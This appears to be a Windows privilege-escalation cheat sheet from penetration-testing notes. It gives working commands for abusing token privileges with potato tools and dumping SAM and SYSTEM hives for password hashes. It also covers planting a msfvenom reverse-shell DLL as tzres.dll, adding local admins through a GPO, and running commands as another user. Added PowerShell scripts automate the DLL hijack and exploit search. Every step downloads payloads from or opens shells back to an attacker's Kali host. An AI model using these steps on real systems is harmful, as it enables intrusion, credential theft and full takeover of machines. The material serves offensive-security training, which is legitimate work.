Exploits

SeBackupPrivilege

1. Copy the SAM and SYSTEM hives (reg.exe uses SeBackupPrivilege to read them even though the current user has no ACL access; both hives are needed, SYSTEM holds the boot key that decrypts SAM)

reg save hklm\sam C:\Users\<Username>\SAM

reg save hklm\system C:\Users\<Username>\SYSTEM

2. Bring the files to Kali

3. Dump the hashes (secretsdump extracts the NTLM hashes offline; they can then be cracked or used directly for pass-the-hash)

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

SeImpersonatePrivilege

Usually held by service accounts (IIS, MSSQL and similar); the potato tools abuse it to impersonate a SYSTEM token and run a command with it.

SigmaPotato.exe

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe

1. Download SigmaPotato.exe onto the target machine

iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe

2. Execute the command

./SigmaPotato.exe "<Command To Execute>"

EXAMPLE: send a reverse shell back to Kali (start a listener there first)

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

PrintSpoofer.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe

1. Download PrintSpoofer.exe (pick the build that matches the target architecture)

iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe

2. Execute the command (-i runs the new process interactively in the current console, -c gives the command; the Print Spooler service must be running, so this fails where Spooler has been disabled)

PrintSpoofer.exe -i -c <Command To Execute>

GodPotato.exe

NOTE: check which .NET Framework runtimes are installed first and pick the matching build

reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe

1. Download GodPotato.exe

iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe

2. Execute the command

./GodPotato.exe -cmd "<Command to execute>"
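Reading the whole NDP tree with reg query is noisy; the function below, an added example that is not part of the original page or of GodPotato, reads the same registry keys and returns the GodPotato build to download. It relies on the standard layout of that tree: .NET 4.x marks NDP\v4\Full with Install=1 and a Release DWORD, .NET 3.5 marks NDP\v3.5 with Install=1, and .NET 2.0 marks NDP\v2.0.50727 with Install=1.

```powershell
# Added example: choose GodPotato-NET2 / NET35 / NET4 from the installed runtimes.
function Get-GodPotatoBuild {
    $ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'

    # .NET 4.x: NDP\v4\Full, Install=1, Release encodes the exact 4.x version.
    $v4 = Get-ItemProperty -Path "$ndp\v4\Full" -ErrorAction SilentlyContinue
    if ($v4 -and $v4.Install -eq 1) {
        return [pscustomobject]@{ Binary = 'GodPotato-NET4.exe'; Release = $v4.Release }
    }

    # .NET 3.5: NDP\v3.5, Install=1 (runs on the 2.0 CLR, but has its own build).
    $v35 = Get-ItemProperty -Path "$ndp\v3.5" -ErrorAction SilentlyContinue
    if ($v35 -and $v35.Install -eq 1) {
        return [pscustomobject]@{ Binary = 'GodPotato-NET35.exe'; Release = $null }
    }

    # .NET 2.0: NDP\v2.0.50727, Install=1.
    $v2 = Get-ItemProperty -Path "$ndp\v2.0.50727" -ErrorAction SilentlyContinue
    if ($v2 -and $v2.Install -eq 1) {
        return [pscustomobject]@{ Binary = 'GodPotato-NET2.exe'; Release = $null }
    }

    throw 'No .NET Framework runtime registered under NDP; GodPotato needs one.'
}

Get-GodPotatoBuild
```

On anything current the answer is almost always GodPotato-NET4.exe; the 3.5 and 2.0 branches matter on old or stripped-down servers where 4.x was never installed.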

SeRestorePrivilege

SeRestoreAbuse.exe

wget https://github.com/dxnboy/redteam/raw/refs/heads/master/SeRestoreAbuse.exe

1. Create a reverse shell executable on Kali (for example with msfvenom, as in the SeManageVolumePrivilege section) and start a listener

2. Download SeRestoreAbuse.exe and the shell file

iwr -Uri http://<Kali IP Address>/SeRestoreAbuse.exe -OutFile SeRestoreAbuse.exe

iwr -Uri http://<Kali IP Address>/<Shell File Name> -OutFile <Shell File Name>

3. Execute the command (give the full path; the tool uses SeRestorePrivilege to make a service run the file as SYSTEM)

.\SeRestoreAbuse.exe <Full Path to Shell File>

SeManageVolumePrivilege

wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

1. Download SeManageVolumeExploit.exe

iwr -Uri http://<Kali IP Address>/SeManageVolumeExploit.exe -OutFile SeManageVolumeExploit.exe

2. Execute the command (it rewrites the ACLs so the current user can write under C:\Windows)

.\SeManageVolumeExploit.exe

3. Create a reverse shell DLL on Kali and start a listener (msfvenom runs on Kali, so write the DLL locally and transfer it in the next step)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f dll -o tzres.dll

4. Place the DLL in System32\wbem on the target (the directory is wbem, not webm)

iwr -Uri http://<Kali IP Address>/tzres.dll -OutFile C:\Windows\System32\wbem\tzres.dll

5. Trigger the DLL load

systeminfo
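Steps 2 to 5 above are easy to get wrong silently: if the exploit did not actually change the ACL, iwr fails on the wbem path and systeminfo simply loads the real tzres.dll. The script below is an added example, not from the original page or from SeManageVolumeExploit, that probes for write access under C:\Windows first, then stages the DLL and triggers it. The URL is a placeholder in the same style as the rest of the page; it assumes the msfvenom DLL is served from Kali and a listener is already waiting on the port baked into it.

```powershell
# Added example: verify the ACL change, then stage tzres.dll and trigger it.
function Test-WindowsWrite {
    # Try to create and delete a probe file directly under C:\Windows.
    # Before the exploit this throws UnauthorizedAccessException for a normal user.
    $probe = Join-Path $env:SystemRoot ('semv_probe_{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch [System.UnauthorizedAccessException] {
        return $false
    }
}

function Invoke-TzresHijack {
    param([Parameter(Mandatory)][string]$KaliUrl)   # where Kali serves tzres.dll

    if (-not (Test-WindowsWrite)) {
        throw 'C:\Windows is not writable; run SeManageVolumeExploit.exe first.'
    }

    # The trigger this page relies on: systeminfo picks up tzres.dll from
    # System32\wbem when one is planted there.
    $target = Join-Path $env:SystemRoot 'System32\wbem\tzres.dll'
    Invoke-WebRequest -Uri $KaliUrl -OutFile $target
    if (-not (Test-Path -LiteralPath $target)) {
        throw "Failed to write $target"
    }

    # Load the DLL; the reverse shell connects back to the listener.
    systeminfo | Out-Null
}

Invoke-TzresHijack -KaliUrl 'http://<Kali IP Address>/tzres.dll'
```

If Test-WindowsWrite returns true but no shell arrives, check the listener and the architecture of the payload (the page uses windows/x64; a 32-bit process will not load it).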

GPO Abuse

wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe

1. Download SharpGPOAbuse.exe

iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe

2. Run the command (the current user needs write rights on that GPO, and the GPO must be linked to an OU that contains the target computer)

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"

3. Force Group Policy to update on the target (otherwise the change only lands at the next scheduled refresh)

gpupdate /force

SearchSploit

1. Windows enumeration: identify OS name, version and architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic os get Caption,Version,OSArchitecture

NOTE: the Windows build number is the last part of the "OS Version" line. wmic is deprecated and no longer installed by default on the newest Windows 11 builds; Get-CimInstance Win32_OperatingSystem returns the same fields.

2. Search for an exploit in SearchSploit (all terms are ANDed against the entry title, so start broad and narrow down)

searchsploit <Key Word>

EXAMPLE:

searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"

3. Mirror the exploit into the current directory

searchsploit -m <EDB-ID>
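A kernel exploit found this way is only useful if the matching patch is missing, so the build number should be collected together with the installed hotfixes. The function below is an added example, not code from the original page, that gathers both through CIM (which works where wmic is absent) and builds the searchsploit query in the form used above.

```powershell
# Added example: collect OS build, architecture and hotfixes for exploit matching.
function Get-ExploitSearchContext {
    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Installed KBs, oldest first; compare against the fix for any candidate CVE.
    $hotfixes = Get-HotFix |
        Sort-Object InstalledOn |
        Select-Object -ExpandProperty HotFixID

    [pscustomobject]@{
        Caption           = $os.Caption           # e.g. Microsoft Windows 10 Pro
        Version           = $os.Version           # e.g. 10.0.19045
        Build             = $os.BuildNumber       # e.g. 19045
        Architecture      = $os.OSArchitecture    # e.g. 64-bit
        Hotfixes          = $hotfixes
        # Query to run on Kali, in the form this section uses.
        SearchsploitQuery = ('searchsploit "Windows Kernel Build {0} Local Privilege Escalation"' -f $os.BuildNumber)
    }
}

$ctx = Get-ExploitSearchContext
$ctx | Format-List
```

Get-HotFix only lists updates recorded through Windows Update or WUSA; on systems patched by other means (such as WSUS offline packages or image updates) it can be incomplete, so treat an absent KB as a hint, not proof that the system is vulnerable.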

Run as another user

GUI (runas asks for the password on the console, so it needs an interactive session)

runas /user:<Domain Name>\<Username> cmd.exe

CLI (works from a non-interactive reverse shell because the password is passed as an argument)

wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1

1. Download Invoke-RunasCs.ps1

iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -OutFile Invoke-RunasCs.ps1

2. Run the command (load the script into the session first by dot-sourcing it, i.e. ". .\Invoke-RunasCs.ps1", otherwise the function is not defined)

Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"
